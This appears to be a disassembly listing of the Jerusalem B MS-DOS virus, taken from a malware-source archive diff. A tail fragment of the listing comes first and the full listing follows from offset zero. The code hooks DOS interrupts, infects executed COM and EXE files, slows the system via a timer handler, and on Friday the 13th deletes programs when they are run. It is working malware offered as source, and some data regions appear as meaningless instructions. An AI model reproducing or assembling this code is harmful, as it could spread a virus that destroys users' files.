0000:057D BA4F00 MOV DX,004FH
0000:0580 B440 MOV AH,040H
0000:0582 CD21 INT 021H
0000:0584 7211 X0584: JB X0597
0000:0586 3BC1 CMP AX,CX
0000:0588 7518 JNZ X05A2
0000:058A 8B167C00 MOV DX,[Y007CH]
0000:058E 8B0E7E00 MOV CX,[Y007EH]
0000:0592 B80042 MOV AX,04200H
0000:0595 CD21 INT 021H
0000:0597 7209 X0597: JB X05A2
0000:0599 33D2 XOR DX,DX
0000:059B B91007 MOV CX,0710H
0000:059E B440 MOV AH,040H
0000:05A0 CD21 INT 021H
0000:05A2 2E833E8F0000 X05A2: CMP WORD PTR CS:[Y008FH],0000H
0000:05A8 7404 JZ X05AE
0000:05AA B449 MOV AH,049H
0000:05AC CD21 INT 021H
0000:05AE 2E833E7000FF X05AE: CMP WORD PTR CS:[Y0070H],0FFFFH
0000:05B4 7431 JZ X05E7
0000:05B6 2E8B1E7000 MOV BX,CS:[Y0070H]
0000:05BB 2E8B167400 MOV DX,CS:[Y0074H]
0000:05C0 2E8B0E7600 MOV CX,CS:[Y0076H]
0000:05C5 B80157 MOV AX,05701H
0000:05C8 CD21 INT 021H
0000:05CA B43E MOV AH,03EH
0000:05CC CD21 INT 021H
0000:05CE 2EC5168000 LDS DX,CS:[Y0080H]
0000:05D3 2E8B0E7200 MOV CX,CS:[Y0072H]
0000:05D8 B80143 MOV AX,04301H
0000:05DB CD21 INT 021H
0000:05DD 2EC5161B00 LDS DX,CS:[Y001BH]
0000:05E2 B82425 MOV AX,02524H
0000:05E5 CD21 INT 021H
0000:05E7 07 X05E7: POP ES
0000:05E8 1F POP DS
0000:05E9 5F POP DI
0000:05EA 5E POP SI
0000:05EB 5A POP DX
0000:05EC 59 POP CX
0000:05ED 5B POP BX
0000:05EE 58 POP AX
0000:05EF 9D POPF
0000:05F0 2EFF2E1700 JMP CS:[Y0017H]
0000:05F5 0000 X05F5: ADD [BX+SI],AL
0000:05F7 0000 ADD [BX+SI],AL
0000:05F9 0000 ADD [BX+SI],AL
0000:05FB 0000 ADD [BX+SI],AL
0000:05FD 0000 ADD [BX+SI],AL
0000:05FF 004D00 ADD [DI+00H],CL
0000:0602 000F ADD [BX],CL
0000:0604 0000 ADD [BX+SI],AL
0000:0606 0000 ADD [BX+SI],AL
"JV.MOC" PAGE 0012
0000:0608 0000 ADD [BX+SI],AL
0000:060A 0000 ADD [BX+SI],AL
0000:060C 0000 ADD [BX+SI],AL
0000:060E 0000 ADD [BX+SI],AL
0000:0610 CD20 INT 020H
0000:0612 00A0009A ADD [BX+SI+Y09A00H],AH
0000:0616 F0FE1D LOCK CALL [DI] ; NOT VALID
0000:0619 F02F LOCK DAS
0000:061B 018E1E3C ADD [BP+Y03C1EH],CX
0000:061F 018E1EEB ADD [BP+Y0EB1EH],CX
0000:0623 048E ADD AL,08EH
0000:0625 1E PUSH DS
0000:0626 8E1EFFFF MOV DS,[Y0FFFFH]
0000:062A FFFF ??? DI
0000:062C FFFF ??? DI
0000:062E FFFF ??? DI
0000:0630 FFFF ??? DI
0000:0632 FFFF ??? DI
0000:0634 FFFF ??? DI
0000:0636 FFFF ??? DI
0000:0638 FFFF ??? DI
0000:063A FFFF ??? DI
0000:063C 7C1F JL X065D
0000:063E DE3E8D29 ESC 037H,[Y0298DH]
0000:0642 1400 ADC AL,00H
0000:0644 1800 SBB [BX+SI],AL
0000:0646 F1 DB 0F1H
0000:0647 1F POP DS
0000:0648 FFFF ??? DI
0000:064A FFFF ??? DI
0000:064C 0000 ADD [BX+SI],AL
0000:064E 0000 ADD [BX+SI],AL
0000:0650 0000 ADD [BX+SI],AL
0000:0652 0000 ADD [BX+SI],AL
0000:0654 0000 ADD [BX+SI],AL
0000:0656 0000 ADD [BX+SI],AL
0000:0658 0000 ADD [BX+SI],AL
0000:065A 0000 ADD [BX+SI],AL
0000:065C 0000 ADD [BX+SI],AL
0000:065E 0000 ADD [BX+SI],AL
0000:0660 CD21 INT 021H
0000:0662 CB RET ; INTERSEGMENT
0000:0663 0000 X0663: ADD [BX+SI],AL
0000:0665 0000 ADD [BX+SI],AL
0000:0667 0000 ADD [BX+SI],AL
0000:0669 0000 ADD [BX+SI],AL
0000:066B 0000 ADD [BX+SI],AL
0000:066D 2020 AND [BX+SI],AH
0000:066F 2020 AND [BX+SI],AH
0000:0671 2020 AND [BX+SI],AH
0000:0673 2020 AND [BX+SI],AH
0000:0675 2020 AND [BX+SI],AH
0000:0677 2000 AND [BX+SI],AL
0000:0679 0000 ADD [BX+SI],AL
0000:067B 0000 ADD [BX+SI],AL
0000:067D 2020 AND [BX+SI],AH
"JV.MOC" PAGE 0013
0000:067F 2020 AND [BX+SI],AH
0000:0681 2020 AND [BX+SI],AH
0000:0683 2020 AND [BX+SI],AH
0000:0685 2020 AND [BX+SI],AH
0000:0687 2000 AND [BX+SI],AL
0000:0689 0000 ADD [BX+SI],AL
0000:068B 0000 ADD [BX+SI],AL
0000:068D 0000 ADD [BX+SI],AL
0000:068F 0000 ADD [BX+SI],AL
0000:0691 0D6B6F OR AX,06F6BH
0000:0694 6465 JZ X06FB
0000:0696 6572 JNZ X070A
0000:0698 7A2E JPE X06C8
0000:069A 6578 JNZ X0714
0000:069C 6520 JNZ X06BE
0000:069E 613A JNO X06DA
0000:06A0 6B6F JPO X0711
0000:06A2 6465 JZ X0709
0000:06A4 6572 JNZ X0718
0000:06A6 2E6578 JNZ X0721
0000:06A9 650D JNZ X06B8
0000:06AB 0000 ADD [BX+SI],AL
0000:06AD 0000 ADD [BX+SI],AL
0000:06AF 0000 ADD [BX+SI],AL
0000:06B1 0000 ADD [BX+SI],AL
0000:06B3 0000 ADD [BX+SI],AL
0000:06B5 0000 ADD [BX+SI],AL
0000:06B7 0000 ADD [BX+SI],AL
0000:06B9 0000 ADD [BX+SI],AL
0000:06BB 0000 ADD [BX+SI],AL
0000:06BD 0000 ADD [BX+SI],AL
0000:06BF 0000 ADD [BX+SI],AL
0000:06C1 0000 ADD [BX+SI],AL
0000:06C3 0000 ADD [BX+SI],AL
0000:06C5 0000 ADD [BX+SI],AL
0000:06C7 0000 ADD [BX+SI],AL
0000:06C9 0000 ADD [BX+SI],AL
0000:06CB 0000 ADD [BX+SI],AL
0000:06CD 0000 ADD [BX+SI],AL
0000:06CF 0000 ADD [BX+SI],AL
0000:06D1 0000 ADD [BX+SI],AL
0000:06D3 0000 ADD [BX+SI],AL
0000:06D5 0000 ADD [BX+SI],AL
0000:06D7 0000 ADD [BX+SI],AL
0000:06D9 005718 ADD [BX+018H],DL
0000:06DC 0825 OR [DI],AH
0000:06DE A5 MOVSW
0000:06DF FEC5 INC CH
0000:06E1 07 POP ES
0000:06E2 1E PUSH DS
0000:06E3 0210 ADD DL,[BX+SI]
0000:06E5 07 POP ES
0000:06E6 57 PUSH DI
0000:06E7 18B10D47 SBB [BX+DI+Y0470DH],DH
0000:06EB 0104 ADD [SI],AX
0000:06ED 7F70 JG X075F
"JV.MOC" PAGE 0014
0000:06EF 0010 ADD [BX+SI],DL
0000:06F1 07 POP ES
0000:06F2 1D001C SBB AX,01C00H
0000:06F5 09A20D3D OR [BP+SI+Y03D0DH],SP
0000:06F9 0C1B OR AL,01BH
0000:06FB 02B10D02 X06FB: ADD DH,[BX+DI+Y020DH]
0000:06FF F24D REPNE DEC BP
0000:0701 360E PUSH CS
0000:0703 0300 ADD AX,[BX+SI]
0000:0705 0000 ADD [BX+SI],AL
0000:0707 00EE ADD DH,CH
0000:0709 002A X0709: ADD [BP+SI],CH
0000:070B 0F POP CS
0000:070C 42 INC DX
0000:070D 01C1 ADD CX,AX
0000:070F 0DB44C OR AX,04CB4H
0000:0712 B000 MOV AL,00H
0000:0714 CD21 X0714: INT 021H
0000:0716 4D DEC BP
0000:0717 7344 JAE X075D
0000:0719 6F73 JG X078E

MSDOS/J-Index/Virus.MSDOS.Unknown.jeru.asm
+794
View File
@@ -0,0 +1,794 @@
This is the Jerusalem B Virus.
"JV.MOC" PAGE 0001
0000:0000 E99200 JMP X0095
0000:0003 7355 JAE X005A
0000:0005 4D DEC BP
0000:0006 7344 JAE X004C
0000:0008 6F73 JG X007D
0000:000A 0001 ADD [BX+DI],AL
0000:000C BD1700 MOV BP,0017H
0000:000F 0000 ADD [BX+SI],AL
0000:0011 06 PUSH ES
0000:0012 00A5FE00 ADD [DI+Y00FEH],AH
0000:0016 F016 LOCK PUSH SS
0000:0018 17 POP SS
0000:0019 7702 JA X001D
0000:001B BF053D MOV DI,03D05H
0000:001E 0CFB OR AL,0FBH
0000:0020 7D00 JGE X0022
0000:0022 0000 X0022: ADD [BX+SI],AL
0000:0024 0000 ADD [BX+SI],AL
0000:0026 0000 ADD [BX+SI],AL
0000:0028 0000 ADD [BX+SI],AL
0000:002A 0000 ADD [BX+SI],AL
0000:002C 0000 ADD [BX+SI],AL
0000:002E E8062A CALL X2A37
0000:0031 B10D MOV CL,0DH
0000:0033 800000 ADD BYTE PTR [BX+SI],00H
0000:0036 008000B1 ADD [BX+SI+Y0B100H],AL
0000:003A 0D5C00 OR AX,005CH
0000:003D B10D MOV CL,0DH
0000:003F 6C00 JL X0041
0000:0041 B10D X0041: MOV CL,0DH
0000:0043 0004 ADD [SI],AL
0000:0045 5F POP DI
0000:0046 0F POP CS
0000:0047 B400 MOV AH,00H
0000:0049 C1 RET ; INTRASEGMENT
0000:004A 0D00F0 X004A: OR AX,0F000H
0000:004D 06 PUSH ES
0000:004E 004D5A ADD [DI+05AH],CL
0000:0051 2000 AND [BX+SI],AL
0000:0053 1000 ADC [BX+SI],AL
0000:0055 1900 SBB [BX+SI],AX
0000:0057 0800 OR [BX+SI],AL
0000:0059 7500 JNZ X005B
0000:005B 7500 X005B: JNZ X005D
0000:005D 6901 X005D: JNS X0060
0000:005F 1007 ADC [BX],AL
0000:0061 8419 TEST BL,[BX+DI]
0000:0063 C500 LDS AX,[BX+SI]
0000:0065 6901 JNS X0068
0000:0067 1C00 SBB AL,00H
0000:0069 0000 ADD [BX+SI],AL
0000:006B 4C X006B: DEC SP
0000:006C B000 MOV AL,00H
0000:006E CD21 INT 021H
0000:0070 050020 ADD AX,02000H
0000:0073 0037 ADD [BX],DH
"JV.MOC" PAGE 0002
0000:0075 121C ADC BL,[SI]
0000:0077 0100 ADD [BX+SI],AX
0000:0079 0210 ADD DL,[BX+SI]
0000:007B 0010 ADD [BX+SI],DL
0000:007D 17 X007D: POP SS
0000:007E 0000 ADD [BX+SI],AL
0000:0080 53 PUSH BX
0000:0081 61E8 JNO X006B
0000:0083 38434F CMP [BP+DI+04FH],AL
0000:0086 4D DEC BP
0000:0087 4D DEC BP
0000:0088 41 INC CX
0000:0089 4E DEC SI
0000:008A 44 INC SP
0000:008B 2E43 INC BX
0000:008D 4F DEC DI
0000:008E 4D DEC BP
0000:008F 0100 ADD [BX+SI],AX
0000:0091 0000 ADD [BX+SI],AL
0000:0093 0000 ADD [BX+SI],AL
0000:0095 FC X0095: CLD
0000:0096 B4E0 MOV AH,0E0H
0000:0098 CD21 INT 021H
0000:009A 80FCE0 CMP AH,0E0H
0000:009D 7316 JAE X00B5
0000:009F 80FC03 CMP AH,03H
0000:00A2 7211 JB X00B5
0000:00A4 B4DD MOV AH,0DDH
0000:00A6 BF0001 MOV DI,0100H
0000:00A9 BE1007 MOV SI,0710H
0000:00AC 03F7 ADD SI,DI
0000:00AE 2E8B8D1100 MOV CX,CS:[DI+Y0011H]
0000:00B3 CD21 INT 021H
0000:00B5 8CC8 X00B5: MOV AX,CS
0000:00B7 051000 ADD AX,0010H
0000:00BA 8ED0 MOV SS,AX
0000:00BC BC0007 MOV SP,0700H
0000:00BF 50 PUSH AX
0000:00C0 B8C500 MOV AX,00C5H
0000:00C3 50 PUSH AX
0000:00C4 CB RET ; INTERSEGMENT
0000:00C5 FC X00C5: CLD
0000:00C6 06 PUSH ES
0000:00C7 2E8C063100 MOV CS:[Y0031H],ES
0000:00CC 2E8C063900 MOV CS:[Y0039H],ES
0000:00D1 2E8C063D00 MOV CS:[Y003DH],ES
0000:00D6 2E8C064100 MOV CS:[Y0041H],ES
0000:00DB 8CC0 MOV AX,ES
0000:00DD 051000 ADD AX,0010H
0000:00E0 2E01064900 ADD CS:[Y0049H],AX
0000:00E5 2E01064500 ADD CS:[Y0045H],AX
0000:00EA B4E0 MOV AH,0E0H
0000:00EC CD21 INT 021H
0000:00EE 80FCE0 CMP AH,0E0H
0000:00F1 7313 JAE X0106
0000:00F3 80FC03 CMP AH,03H
"JV.MOC" PAGE 0003
0000:00F6 07 POP ES
0000:00F7 2E8E164500 MOV SS,CS:[Y0045H]
0000:00FC 2E8B264300 MOV SP,CS:[Y0043H]
0000:0101 2EFF2E4700 JMP CS:[Y0047H]
0000:0106 33C0 X0106: XOR AX,AX
0000:0108 8EC0 MOV ES,AX
0000:010A 26A1FC03 MOV AX,ES:Y03FCH
0000:010E 2EA34B00 MOV CS:Y004BH,AX
0000:0112 26A0FE03 MOV AL,ES:Y03FEH
0000:0116 2EA24D00 MOV CS:Y004DH,AL
0000:011A 26C706FC03F3A5 MOV WORD PTR ES:[Y03FCH],0A5F3H
0000:0121 26C606FE03CB MOV BYTE PTR ES:[Y03FEH],0CBH
0000:0127 58 POP AX
0000:0128 051000 ADD AX,0010H
0000:012B 8EC0 MOV ES,AX
0000:012D 0E PUSH CS
0000:012E 1F POP DS
0000:012F B91007 MOV CX,0710H
0000:0132 D1E9 SHR CX,1
0000:0134 33F6 XOR SI,SI
0000:0136 8BFE MOV DI,SI
0000:0138 06 PUSH ES
0000:0139 B84201 MOV AX,0142H
0000:013C 50 PUSH AX
0000:013D EAFC030000 JMP X0000_03FC
0000:0142 8CC8 MOV AX,CS
0000:0144 8ED0 MOV SS,AX
0000:0146 BC0007 MOV SP,0700H
0000:0149 33C0 XOR AX,AX
0000:014B 8ED8 MOV DS,AX
0000:014D 2EA14B00 MOV AX,CS:Y004BH
0000:0151 A3FC03 MOV Y03FCH,AX
0000:0154 2EA04D00 MOV AL,CS:Y004DH
0000:0158 A2FE03 MOV Y03FEH,AL
0000:015B 8BDC MOV BX,SP
0000:015D B104 MOV CL,04H
0000:015F D3EB SHR BX,CL
0000:0161 83C310 ADD BX,0010H
0000:0164 2E891E3300 MOV CS:[Y0033H],BX
0000:0169 B44A MOV AH,04AH
0000:016B 2E8E063100 MOV ES,CS:[Y0031H]
0000:0170 CD21 INT 021H
0000:0172 B82135 MOV AX,03521H
0000:0175 CD21 INT 021H
0000:0177 2E891E1700 MOV CS:[Y0017H],BX
0000:017C 2E8C061900 MOV CS:[Y0019H],ES
0000:0181 0E PUSH CS
0000:0182 1F POP DS
0000:0183 BA5B02 MOV DX,025BH
0000:0186 B82125 MOV AX,02521H
0000:0189 CD21 INT 021H
0000:018B 8E063100 MOV ES,[Y0031H]
0000:018F 268E062C00 MOV ES,ES:[Y002CH]
0000:0194 33FF XOR DI,DI
0000:0196 B9FF7F MOV CX,07FFFH
0000:0199 32C0 XOR AL,AL
"JV.MOC" PAGE 0004
0000:019B F2AE X019B: REPNE SCASB
0000:019D 263805 CMP ES:[DI],AL
0000:01A0 E0F9 LOOPNZ X019B
0000:01A2 8BD7 MOV DX,DI
0000:01A4 83C203 ADD DX,0003H
0000:01A7 B8004B MOV AX,04B00H
0000:01AA 06 PUSH ES
0000:01AB 1F POP DS
0000:01AC 0E PUSH CS
0000:01AD 07 POP ES
0000:01AE BB3500 MOV BX,0035H
0000:01B1 1E PUSH DS
0000:01B2 06 PUSH ES
0000:01B3 50 PUSH AX
0000:01B4 53 PUSH BX
0000:01B5 51 PUSH CX
0000:01B6 52 PUSH DX
0000:01B7 B42A MOV AH,02AH
0000:01B9 CD21 INT 021H
0000:01BB 2EC6060E0000 MOV BYTE PTR CS:[Y000EH],00H
0000:01C1 81F9C307 CMP CX,07C3H
0000:01C5 7430 JZ X01F7
0000:01C7 3C05 CMP AL,05H
0000:01C9 750D JNZ X01D8
0000:01CB 80FA0D CMP DL,0DH
0000:01CE 7508 JNZ X01D8
0000:01D0 2EFE060E00 INC BYTE PTR CS:[Y000EH]
0000:01D5 EB20 JMP X01F7
0000:01D7 90 NOP
0000:01D8 B80835 X01D8: MOV AX,03508H
0000:01DB CD21 INT 021H
0000:01DD 2E891E1300 MOV CS:[Y0013H],BX
0000:01E2 2E8C061500 MOV CS:[Y0015H],ES
0000:01E7 0E PUSH CS
0000:01E8 1F POP DS
0000:01E9 C7061F00907E MOV WORD PTR [Y001FH],07E90H
0000:01EF B80825 MOV AX,02508H
0000:01F2 BA1E02 MOV DX,021EH
0000:01F5 CD21 INT 021H
0000:01F7 5A X01F7: POP DX
0000:01F8 59 POP CX
0000:01F9 5B POP BX
0000:01FA 58 POP AX
0000:01FB 07 POP ES
0000:01FC 1F POP DS
0000:01FD 9C PUSHF
0000:01FE 2EFF1E1700 CALL CS:[Y0017H]
0000:0203 1E PUSH DS
0000:0204 07 POP ES
0000:0205 B449 MOV AH,049H
0000:0207 CD21 INT 021H
0000:0209 B44D MOV AH,04DH
0000:020B CD21 INT 021H
0000:020D B431 MOV AH,031H
0000:020F BA0006 MOV DX,0600H
0000:0212 B104 MOV CL,04H
"JV.MOC" PAGE 0005
0000:0214 D3EA SHR DX,CL
0000:0216 83C210 ADD DX,0010H
0000:0219 CD21 INT 021H
0000:021B 32C0 XOR AL,AL
0000:021D CF IRET
0000:021E 2E833E1F0002 CMP WORD PTR CS:[Y001FH],0002H
0000:0224 7517 JNZ X023D
0000:0226 50 PUSH AX
0000:0227 53 PUSH BX
0000:0228 51 PUSH CX
0000:0229 52 PUSH DX
0000:022A 55 PUSH BP
0000:022B B80206 MOV AX,0602H
0000:022E B787 MOV BH,087H
0000:0230 B90505 MOV CX,0505H
0000:0233 BA1010 MOV DX,01010H
0000:0236 CD10 INT 010H
0000:0238 5D POP BP
0000:0239 5A POP DX
0000:023A 59 POP CX
0000:023B 5B POP BX
0000:023C 58 POP AX
0000:023D 2EFF0E1F00 X023D: DEC WORD PTR CS:[Y001FH]
0000:0242 7512 JNZ X0256
0000:0244 2EC7061F000100 MOV WORD PTR CS:[Y001FH],0001H
0000:024B 50 PUSH AX
0000:024C 51 PUSH CX
0000:024D 56 PUSH SI
0000:024E B90140 MOV CX,04001H
0000:0251 F3AC REPE LODSB
0000:0253 5E POP SI
0000:0254 59 POP CX
0000:0255 58 POP AX
0000:0256 2EFF2E1300 X0256: JMP CS:[Y0013H]
0000:025B 9C X025B: PUSHF
0000:025C 80FCE0 CMP AH,0E0H
0000:025F 7505 JNZ X0266
0000:0261 B80003 MOV AX,0300H
0000:0264 9D POPF
0000:0265 CF IRET
0000:0266 80FCDD X0266: CMP AH,0DDH
0000:0269 7413 JZ X027E
0000:026B 80FCDE CMP AH,0DEH
0000:026E 7428 JZ X0298
0000:0270 3D004B CMP AX,04B00H
0000:0273 7503 JNZ X0278
0000:0275 E9B400 JMP X032C
0000:0278 9D X0278: POPF
0000:0279 2EFF2E1700 JMP CS:[Y0017H]
0000:027E 58 X027E: POP AX
0000:027F 58 POP AX
0000:0280 B80001 MOV AX,0100H
0000:0283 2EA30A00 MOV CS:Y000AH,AX
0000:0287 58 POP AX
0000:0288 2EA30C00 MOV CS:Y000CH,AX
0000:028C F3A4 REPE MOVSB
"JV.MOC" PAGE 0006
0000:028E 9D POPF
0000:028F 2EA10F00 MOV AX,CS:Y000FH
0000:0293 2EFF2E0A00 JMP CS:[Y000AH]
0000:0298 83C406 X0298: ADD SP,0006H
0000:029B 9D POPF
0000:029C 8CC8 MOV AX,CS
0000:029E 8ED0 MOV SS,AX
0000:02A0 BC1007 MOV SP,0710H
0000:02A3 06 PUSH ES
0000:02A4 06 PUSH ES
0000:02A5 33FF XOR DI,DI
0000:02A7 0E PUSH CS
0000:02A8 07 POP ES
0000:02A9 B91000 MOV CX,0010H
0000:02AC 8BF3 MOV SI,BX
0000:02AE BF2100 MOV DI,0021H
0000:02B1 F3A4 REPE MOVSB
0000:02B3 8CD8 MOV AX,DS
0000:02B5 8EC0 MOV ES,AX
0000:02B7 2EF7267A00 MUL WORD PTR CS:[Y007AH]
0000:02BC 2E03062B00 ADD AX,CS:[Y002BH]
0000:02C1 83D200 ADC DX,0000H
0000:02C4 2EF7367A00 DIV WORD PTR CS:[Y007AH]
0000:02C9 8ED8 MOV DS,AX
0000:02CB 8BF2 MOV SI,DX
0000:02CD 8BFA MOV DI,DX
0000:02CF 8CC5 MOV BP,ES
0000:02D1 2E8B1E2F00 MOV BX,CS:[Y002FH]
0000:02D6 0BDB OR BX,BX
0000:02D8 7413 JZ X02ED
0000:02DA B90080 X02DA: MOV CX,08000H
0000:02DD F3A5 REPE MOVSW
0000:02DF 050010 ADD AX,01000H
0000:02E2 81C50010 ADD BP,01000H
0000:02E6 8ED8 MOV DS,AX
0000:02E8 8EC5 MOV ES,BP
0000:02EA 4B DEC BX
0000:02EB 75ED JNZ X02DA
0000:02ED 2E8B0E2D00 X02ED: MOV CX,CS:[Y002DH]
0000:02F2 F3A4 REPE MOVSB
0000:02F4 58 POP AX
0000:02F5 50 PUSH AX
0000:02F6 051000 ADD AX,0010H
0000:02F9 2E01062900 ADD CS:[Y0029H],AX
0000:02FE 2E01062500 ADD CS:[Y0025H],AX
0000:0303 2EA12100 MOV AX,CS:Y0021H
0000:0307 1F POP DS
0000:0308 07 POP ES
0000:0309 2E8E162900 MOV SS,CS:[Y0029H]
0000:030E 2E8B262700 MOV SP,CS:[Y0027H]
0000:0313 2EFF2E2300 JMP CS:[Y0023H]
0000:0318 33C9 X0318: XOR CX,CX
0000:031A B80143 MOV AX,04301H
0000:031D CD21 INT 021H
0000:031F B441 MOV AH,041H
0000:0321 CD21 INT 021H
"JV.MOC" PAGE 0007
0000:0323 B8004B MOV AX,04B00H
0000:0326 9D POPF
0000:0327 2EFF2E1700 JMP CS:[Y0017H]
0000:032C 2E803E0E0001 X032C: CMP BYTE PTR CS:[Y000EH],01H
0000:0332 74E4 JZ X0318
0000:0334 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH
0000:033B 2EC7068F000000 MOV WORD PTR CS:[Y008FH],0000H
0000:0342 2E89168000 MOV CS:[Y0080H],DX
0000:0347 2E8C1E8200 MOV CS:[Y0082H],DS
0000:034C 50 PUSH AX
0000:034D 53 PUSH BX
0000:034E 51 PUSH CX
0000:034F 52 PUSH DX
0000:0350 56 PUSH SI
0000:0351 57 PUSH DI
0000:0352 1E PUSH DS
0000:0353 06 PUSH ES
0000:0354 FC CLD
0000:0355 8BFA MOV DI,DX
0000:0357 32D2 XOR DL,DL
0000:0359 807D013A CMP BYTE PTR [DI+01H],03AH
0000:035D 7505 JNZ X0364
0000:035F 8A15 MOV DL,[DI]
0000:0361 80E21F AND DL,01FH
0000:0364 B436 X0364: MOV AH,036H
0000:0366 CD21 INT 021H
0000:0368 3DFFFF CMP AX,0FFFFH
0000:036B 7503 JNZ X0370
0000:036D E97702 X036D: JMP X05E7
0000:0370 F7E3 X0370: MUL BX
0000:0372 F7E1 MUL CX
0000:0374 0BD2 OR DX,DX
0000:0376 7505 JNZ X037D
0000:0378 3D1007 CMP AX,0710H
0000:037B 72F0 JB X036D
0000:037D 2E8B168000 X037D: MOV DX,CS:[Y0080H]
0000:0382 1E PUSH DS
0000:0383 07 POP ES
0000:0384 32C0 XOR AL,AL
0000:0386 B94100 MOV CX,0041H
0000:0389 F2AE REPNE SCASB
0000:038B 2E8B368000 MOV SI,CS:[Y0080H]
0000:0390 8A04 X0390: MOV AL,[SI]
0000:0392 0AC0 OR AL,AL
0000:0394 740E JZ X03A4
0000:0396 3C61 CMP AL,061H
0000:0398 7207 JB X03A1
0000:039A 3C7A CMP AL,07AH
0000:039C 7703 JA X03A1
0000:039E 802C20 SUB BYTE PTR [SI],020H
0000:03A1 46 X03A1: INC SI
0000:03A2 EBEC JMP X0390
0000:03A4 B90B00 X03A4: MOV CX,000BH
0000:03A7 2BF1 SUB SI,CX
0000:03A9 BF8400 MOV DI,0084H
0000:03AC 0E PUSH CS
"JV.MOC" PAGE 0008
0000:03AD 07 POP ES
0000:03AE B90B00 MOV CX,000BH
0000:03B1 F3A6 REPE CMPSB
0000:03B3 7503 JNZ X03B8
0000:03B5 E92F02 JMP X05E7
0000:03B8 B80043 X03B8: MOV AX,04300H
0000:03BB CD21 INT 021H
0000:03BD 7205 JB X03C4
0000:03BF 2E890E7200 MOV CS:[Y0072H],CX
0000:03C4 7225 X03C4: JB X03EB
0000:03C6 32C0 XOR AL,AL
0000:03C8 2EA24E00 MOV CS:Y004EH,AL
0000:03CC 1E PUSH DS
0000:03CD 07 POP ES
0000:03CE 8BFA MOV DI,DX
0000:03D0 B94100 MOV CX,0041H
0000:03D3 F2AE REPNE SCASB
0000:03D5 807DFE4D CMP BYTE PTR [DI-02H],04DH
0000:03D9 740B JZ X03E6
0000:03DB 807DFE6D CMP BYTE PTR [DI-02H],06DH
0000:03DF 7405 JZ X03E6
0000:03E1 2EFE064E00 INC BYTE PTR CS:[Y004EH]
0000:03E6 B8003D X03E6: MOV AX,03D00H
0000:03E9 CD21 INT 021H
0000:03EB 725A X03EB: JB X0447
0000:03ED 2EA37000 MOV CS:Y0070H,AX
0000:03F1 8BD8 MOV BX,AX
0000:03F3 B80242 MOV AX,04202H
0000:03F6 B9FFFF MOV CX,0FFFFH
0000:03F9 BAFBFF MOV DX,0FFFBH
0000:03FC CD21 X03FC: INT 021H
0000:03FE 72EB JB X03EB
0000:0400 050500 ADD AX,0005H
0000:0403 2EA31100 MOV CS:Y0011H,AX
0000:0407 B90500 MOV CX,0005H
0000:040A BA6B00 MOV DX,006BH
0000:040D 8CC8 MOV AX,CS
0000:040F 8ED8 MOV DS,AX
0000:0411 8EC0 MOV ES,AX
0000:0413 B43F MOV AH,03FH
0000:0415 CD21 INT 021H
0000:0417 8BFA MOV DI,DX
0000:0419 BE0500 MOV SI,0005H
0000:041C F3A6 REPE CMPSB
0000:041E 7507 JNZ X0427
0000:0420 B43E MOV AH,03EH
0000:0422 CD21 INT 021H
0000:0424 E9C001 JMP X05E7
0000:0427 B82435 X0427: MOV AX,03524H
0000:042A CD21 INT 021H
0000:042C 891E1B00 MOV [Y001BH],BX
0000:0430 8C061D00 MOV [Y001DH],ES
0000:0434 BA1B02 MOV DX,021BH
0000:0437 B82425 MOV AX,02524H
0000:043A CD21 INT 021H
0000:043C C5168000 LDS DX,[Y0080H]
"JV.MOC" PAGE 0009
0000:0440 33C9 XOR CX,CX
0000:0442 B80143 MOV AX,04301H
0000:0445 CD21 INT 021H
0000:0447 723B X0447: JB X0484
0000:0449 2E8B1E7000 MOV BX,CS:[Y0070H]
0000:044E B43E MOV AH,03EH
0000:0450 CD21 INT 021H
0000:0452 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH
0000:0459 B8023D MOV AX,03D02H
0000:045C CD21 INT 021H
0000:045E 7224 JB X0484
0000:0460 2EA37000 MOV CS:Y0070H,AX
0000:0464 8CC8 MOV AX,CS
0000:0466 8ED8 MOV DS,AX
0000:0468 8EC0 MOV ES,AX
0000:046A 8B1E7000 MOV BX,[Y0070H]
0000:046E B80057 MOV AX,05700H
0000:0471 CD21 INT 021H
0000:0473 89167400 MOV [Y0074H],DX
0000:0477 890E7600 MOV [Y0076H],CX
0000:047B B80042 MOV AX,04200H
0000:047E 33C9 XOR CX,CX
0000:0480 8BD1 MOV DX,CX
0000:0482 CD21 INT 021H
0000:0484 723D X0484: JB X04C3
0000:0486 803E4E0000 CMP BYTE PTR [Y004EH],00H
0000:048B 7403 JZ X0490
0000:048D EB57 JMP X04E6
0000:048F 90 NOP
0000:0490 BB0010 X0490: MOV BX,01000H
0000:0493 B448 MOV AH,048H
0000:0495 CD21 INT 021H
0000:0497 730B JAE X04A4
0000:0499 B43E MOV AH,03EH
0000:049B 8B1E7000 MOV BX,[Y0070H]
0000:049F CD21 INT 021H
0000:04A1 E94301 JMP X05E7
0000:04A4 FF068F00 X04A4: INC WORD PTR [Y008FH]
0000:04A8 8EC0 MOV ES,AX
0000:04AA 33F6 XOR SI,SI
0000:04AC 8BFE MOV DI,SI
0000:04AE B91007 MOV CX,0710H
0000:04B1 F3A4 REPE MOVSB
0000:04B3 8BD7 MOV DX,DI
0000:04B5 8B0E1100 MOV CX,[Y0011H]
0000:04B9 8B1E7000 MOV BX,[Y0070H]
0000:04BD 06 PUSH ES
0000:04BE 1F POP DS
0000:04BF B43F MOV AH,03FH
0000:04C1 CD21 INT 021H
0000:04C3 721C X04C3: JB X04E1
0000:04C5 03F9 ADD DI,CX
0000:04C7 33C9 XOR CX,CX
0000:04C9 8BD1 MOV DX,CX
0000:04CB B80042 MOV AX,04200H
0000:04CE CD21 INT 021H
"JV.MOC" PAGE 0010
0000:04D0 BE0500 MOV SI,0005H
0000:04D3 B90500 MOV CX,0005H
0000:04D6 F32EA4 REPE MOVS ES:BYTE PTR (DI),CS:BYTE PT
R (SI)
0000:04D9 8BCF MOV CX,DI
0000:04DB 33D2 XOR DX,DX
0000:04DD B440 MOV AH,040H
0000:04DF CD21 INT 021H
0000:04E1 720D X04E1: JB X04F0
0000:04E3 E9BC00 JMP X05A2
0000:04E6 B91C00 X04E6: MOV CX,001CH
0000:04E9 BA4F00 MOV DX,004FH
0000:04EC B43F MOV AH,03FH
0000:04EE CD21 INT 021H
0000:04F0 724A X04F0: JB X053C
0000:04F2 C70661008419 MOV WORD PTR [Y0061H],01984H
0000:04F8 A15D00 MOV AX,Y005DH
0000:04FB A34500 MOV Y0045H,AX
0000:04FE A15F00 MOV AX,Y005FH
0000:0501 A34300 MOV Y0043H,AX
0000:0504 A16300 MOV AX,Y0063H
